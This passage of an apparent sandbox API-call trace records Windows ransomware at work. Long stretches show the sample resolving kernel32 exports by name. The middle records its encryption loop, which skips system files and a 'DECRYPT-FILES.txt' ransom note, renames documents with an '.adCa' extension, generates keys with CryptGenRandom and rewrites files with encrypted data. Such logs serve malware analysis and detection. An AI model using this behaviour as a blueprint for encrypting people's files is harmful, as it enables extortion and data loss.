(lpString="CREATESEMAPHOREW") returned 16 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.098] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.098] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.098] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.098] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.098] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.098] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.098] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.098] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.098] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.098] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.099] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.099] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.099] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.099] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.099] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.099] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.099] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.099] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.099] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.099] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.099] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.099] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.099] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.099] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.099] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.099] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.099] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.099] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.099] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.099] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.100] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.100] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.100] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.100] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.100] lstrlenA (lpString="DELETEATOM") returned 10 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.100] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.100] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.100] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.100] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.100] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.100] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.100] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.100] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.100] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.100] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.100] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.100] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.100] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.100] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.100] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.101] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.101] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.101] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.101] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.101] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.101] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.101] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.101] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.101] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.101] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.101] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.101] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.101] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.101] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.101] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.101] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.101] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.101] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.101] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.101] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.102] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.102] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.102] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.102] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.102] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.102] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.102] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.102] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.102] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.102] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx") returned 54 [0084.102] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx.adCa") returned 59 [0084.102] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hjy9xqkxo.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx.adCa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hjy9xqkxo.docx.adca"), dwFlags=0x0) returned 1 [0084.103] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.103] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.103] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.104] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf14d41e0, ftCreationTime.dwHighDateTime=0x1d55022, ftLastAccessTime.dwLowDateTime=0x5e8245a0, ftLastAccessTime.dwHighDateTime=0x1d530b4, ftLastWriteTime.dwLowDateTime=0x5e8245a0, ftLastWriteTime.dwHighDateTime=0x1d530b4, nFileSizeHigh=0x0, nFileSizeLow=0x158d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxLbKT0VjkKfD.pptx", cAlternateFileName="HXLBKT~1.PPT")) returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="autorun.inf") returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="boot.ini") returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="desktop.ini") returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="ntuser.dat") returned -1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="iconcache.db") returned -1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="bootsect.bak") returned 1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="ntuser.dat.log") returned -1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="thumbs.db") returned -1 [0084.104] lstrcmpiW (lpString1="hxLbKT0VjkKfD.pptx", lpString2="Bootfont.bin") returned 1 [0084.104] lstrlenW (lpString="hxLbKT0VjkKfD.pptx") returned 18 [0084.104] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0084.104] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0084.104] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0084.104] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0084.104] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.104] lstrlenW (lpString="hxLbKT0VjkKfD.pptx") returned 18 [0084.104] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.104] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="hxLbKT0VjkKfD.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx" [0084.104] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hxLbKT0VjkKfD.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hxlbkt0vjkkfd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.104] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=88273) returned 1 [0084.105] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.105] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.105] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.105] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.105] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.105] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.105] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.107] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.107] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.108] CloseHandle (hObject=0x414) returned 1 [0084.108] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.108] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.109] CloseHandle (hObject=0x0) returned 0 [0084.109] CloseHandle (hObject=0x410) returned 1 [0084.109] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.109] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.110] GetTickCount () returned 0x114d7d9 [0084.110] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.110] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.110] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.110] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.110] lstrlenA (lpString="kernel32.dll") returned 12 [0084.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.110] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.111] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.111] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.111] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.111] lstrlenA (lpString="ADDATOMA") returned 8 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.111] lstrlenA (lpString="ADDATOMW") returned 8 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.111] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.111] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.111] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.111] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.111] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.111] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.111] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.111] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.111] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.111] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.111] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.111] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.111] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.112] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: 